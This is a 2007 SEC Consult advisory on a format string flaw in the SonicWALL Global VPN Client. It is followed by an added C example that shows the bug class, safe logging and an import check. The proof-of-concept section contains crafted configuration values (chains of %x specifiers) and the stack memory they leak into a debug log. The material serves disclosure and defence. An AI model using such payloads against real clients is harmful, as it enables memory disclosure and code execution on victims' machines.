SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
              title: SonicWALL Global VPN Client Format String Vulnerability
            program: SonicWALL Global VPN Client
 vulnerable version: < 4.0.0.830
           homepage: www.sonicwall.com
              found: 06-12-2007
                 by: lofi42*
         perm. link: http://www.sec-consult.com/305.html
=====================================================================================

Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.

Vulnerability overview:
---------------
SonicWALL Global VPN Client suffers from a format string vulnerability that
can be triggered by supplying a specially crafted configuration file. This
vulnerability allows an attacker to execute arbitrary code in the context of
the vulnerable client. For a successful attack, the attacker would have to
entice his victim into importing the special configuration file.

Vulnerability details:
---------------
Format string errors occur when the client parses the "name" attribute of the
"Connection" tag and the content of the "Hostname" tags in the configuration
file.

Examples: %s%s%s%s

The bugs have been verified in version 3.1.556 and beta 4.0.0.810. With
version 3.1.556 the client has to initiate a connection to trigger the
vulnerability, whereas with version 4.0.0.810 the bug can be exploited by
simply double-clicking the configuration file. This can be attributed to the
4.0 version trying to write the imported configuration to an extra debug log.

Proof-of-concept:
---------------
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted
config file and then viewing the debug logfile.

A configuration like this...
AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
---------------------------------------------------------
------------------------------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
-------------------------------------------------------------

This vulnerability allows reading / writing to arbitrary memory addresses
within the process memory space. Exploitation is trivial under these
circumstances.

vendor status:
---------------
vendor notified:  2007-08-16
vendor response:  2007-08-29
patch available:  2007-11-26

The issue has been fixed in SonicWall VPN client 4.0.0.830.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* The vulnerabilities described above have been purchased by SEC Consult
from an independent security researcher. In the research bonus programme,
SEC Consult is looking for security vulnerabilities in common software
products. For more information, contact research [at] sec-consult [dot] com
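The bug class behind the advisory's "Connection name" log line, as an added example that is neither SonicWALL nor SEC Consult code: the untrusted name must be a printf argument, never part of the format string, and an importer can reject names or hostnames that carry conversion specifiers before any logging path sees them. Function names and the sample name are assumptions constructed for the example.

```c
/* Added example (not SonicWALL or SEC Consult code): the format string bug
 * class from the advisory, with the safe logging form and an import check. */
#include <stdio.h>
#include <string.h>

/* Count the conversion specifiers a printf-family routine would try to
 * consume if it were handed `s` as its format string. "%%" is a literal
 * percent sign; flags, width, precision and length modifiers are skipped
 * to reach the conversion character. A dangling '%' also counts: it is
 * malformed and would still be consumed. */
int count_format_specifiers(const char *s)
{
    int n = 0;
    while (*s) {
        if (*s != '%') { s++; continue; }
        s++;
        if (*s == '%') { s++; continue; }           /* "%%" -> literal '%' */
        while (*s && strchr("-+ #0123456789.*hlLqjzt", *s)) s++;
        n++;                                        /* conversion (or dangling '%') */
        if (*s) s++;
    }
    return n;
}

/* Safe form: the imported name is passed as a "%s" argument. The vulnerable
 * pattern is the equivalent of building the message first and then handing
 * that buffer to a printf-family routine as its format string. */
int log_connection_enabled(const char *name, char *out, size_t outsz)
{
    return snprintf(out, outsz, "The connection \"%s\" has been enabled.", name);
}

/* Import-time check: a connection name or hostname has no legitimate use
 * for conversion specifiers. Returns 1 to accept the value, 0 to reject. */
int accept_config_value(const char *value)
{
    return count_format_specifiers(value) == 0;
}

int main(void)
{
    /* constructed sample shaped like the advisory's PoC connection name */
    const char *name = "AAAAAAAAAA%x.%x.%x.%x";
    char line[256];
    printf("specifiers: %d, accepted: %d\n",
           count_format_specifiers(name), accept_config_value(name));
    log_connection_enabled(name, line, sizeof line);
    printf("%s\n", line);                /* the %x sequences survive literally */
    return 0;
}
```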